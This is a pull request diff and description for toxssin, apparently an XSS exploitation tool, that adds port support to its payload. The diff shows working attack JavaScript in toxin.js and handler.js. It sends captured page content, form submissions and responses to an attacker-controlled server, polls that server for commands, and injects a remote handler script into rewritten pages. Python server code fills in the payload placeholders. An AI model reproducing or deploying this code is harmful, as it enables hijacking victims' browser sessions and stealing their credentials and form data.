### PR TITLE
Advanced port support

### DIFF
--- a/handler.js
+++ b/handler.js
@@ -39,7 +39,7 @@ function uuid() {
 
 session_data = establish();
 tox_req = new XMLHttpRequest();
-tox_req.open("GET", `*TOXSSIN_SERVER*/c1cbfe271a40788a00e8bf8574d94d4b/${session_data[0]}/${session_data[1]}`, true);
+tox_req.open("GET", `*TOXSSIN_SERVER*:*TOXSSIN_PORT*/c1cbfe271a40788a00e8bf8574d94d4b/${session_data[0]}/${session_data[1]}`, true);
 
 tox_req.onreadystatechange = function() {
 	if (this.readyState == 4) {

--- a/toxin.js
+++ b/toxin.js
@@ -32,7 +32,7 @@ function rewriteDocument(html) {
 function xhr_get_intercept(capture, r = false) {
 	
 	let xhttp = new XMLHttpRequest();
-	xhttp.open("GET", `*TOXSSIN_SERVER*/${btoa(capture)}`, true);
+	xhttp.open("GET", `*TOXSSIN_SERVER*:*TOXSSIN_PORT*/${btoa(capture)}`, true);
 	xhttp.setRequestHeader('X-toxssin-id', '*SESSIONID*');
 	xhttp.send();
 	
@@ -45,7 +45,7 @@ function xhr_get_intercept(capture, r = false) {
 function xhr_post_intercept(capture, event_hash, data_type = 'form', form_attrs = '', r = false) {
 	
 	let xhttp = new XMLHttpRequest();
-	xhttp.open("POST", `*TOXSSIN_SERVER*/${event_hash}`, true);
+	xhttp.open("POST", `*TOXSSIN_SERVER*:*TOXSSIN_PORT*/${event_hash}`, true);
 	xhttp.setRequestHeader('X-toxssin-id', '*SESSIONID*');
 	
 	for (let attr in form_attrs) {
@@ -69,7 +69,7 @@ function xhr_post_intercept(capture, event_hash, data_type = 'form', form_attrs 
 function command_parser() {
 	
 	let cmd = new XMLHttpRequest();
-	cmd.open("GET", `*TOXSSIN_SERVER*/a95f7870b615a4df433314f10da26548`, true);
+	cmd.open("GET", `*TOXSSIN_SERVER*:*TOXSSIN_PORT*/a95f7870b615a4df433314f10da26548`, true);
 	cmd.setRequestHeader('X-toxssin-id', '*SESSIONID*');
 	
 	cmd.onreadystatechange = function() {
@@ -258,7 +258,7 @@ function interceptResponse(form) {
 
 				response_data.append('response-body', this.responseText);
 				xhr_post_intercept(response_data, '1a60f7f722fd94513b92bd2b19c4f7d4', 'FormData', response_attrs); //THIS SHOULD END WITH FALSE(?)
-				rewriteDocument(this.responseText.replace("</body>", '<script src="*TOXSSIN_SERVER*/*HANDLER*"></script></body>'));
+				rewriteDocument(this.responseText.replace("</body>", '<script src="*TOXSSIN_SERVER*:*TOXSSIN_PORT*/*HANDLER*"></script></body>'));
 			}
 		}
 		
@@ -307,7 +307,7 @@ function interceptLink() {
 			let response_headers = this.getAllResponseHeaders();	
 			let response_attrs = {'source':'link', 'href':escape(nl2br(href)), 'status':this.status, 'statusText':this.statusText, 'responseHeaders':nl2br(response_headers)};			
 			xhr_post_intercept(this.responseText + '\n', '1a60f7f722fd94513b92bd2b19c4f7d4', 'FormData', response_attrs, true);			
-			rewriteDocument(this.responseText.replace("</body>", '<script src="*TOXSSIN_SERVER*/*HANDLER*"></script></body>'));
+			rewriteDocument(this.responseText.replace("</body>", '<script src="*TOXSSIN_SERVER*:*TOXSSIN_PORT*/*HANDLER*"></script></body>'));
 		}
 	}	
 	

--- a/toxssin.py
+++ b/toxssin.py
@@ -92,6 +92,14 @@ if args.url:
 		parser.print_usage()
 		sys.exit(1)
 	 
+if args.port:
+	try:
+		toxssin_server_port = str(args.port)
+	except IndexError:
+		parser.print_usage()
+		sys.exit(1)
+else:
+    toxssin_server_port = '443'
 
 # -------------- General Functions -------------- #                                                            
 def print_banner():
@@ -306,6 +314,7 @@ class Toxssin(BaseHTTPRequestHandler):
 	
 	preferences = {
 		'*TOXSSIN_SERVER*' : toxssin_server_url,
+		'*TOXSSIN_PORT*' : toxssin_server_port,
 		'*POISON_HASH_LINKS*' : 'false',
 		'*HANDLER*' : handler,
 		'*POISON_ELEMENTS*' : poison_elements,
@@ -372,7 +381,7 @@ class Toxssin(BaseHTTPRequestHandler):
 			handler_src = open(f'./handler.js', 'r')
 			payload = handler_src.read()
 			handler_src.close()
-			payload = payload.replace('*TOXSSIN_SERVER*', Toxssin.preferences["*TOXSSIN_SERVER*"]).replace('*COOKIE_AGE*', cookie_age)			
+			payload = payload.replace('*TOXSSIN_SERVER*', Toxssin.preferences["*TOXSSIN_SERVER*"]).replace('*COOKIE_AGE*', cookie_age).replace('*TOXSSIN_PORT*', Toxssin.preferences["*TOXSSIN_PORT*"])			
 			self.wfile.write(bytes(payload, "utf-8"))
 			
 		


### PR DESCRIPTION
The current version offers the argument `-p PORT` to specify a port for the server where the payload is located. In the payload however the specified port is ignored - not sure if this is intentional, but for my use case I had to make these changes to get it to work properly.

Maybe it was meant this way?
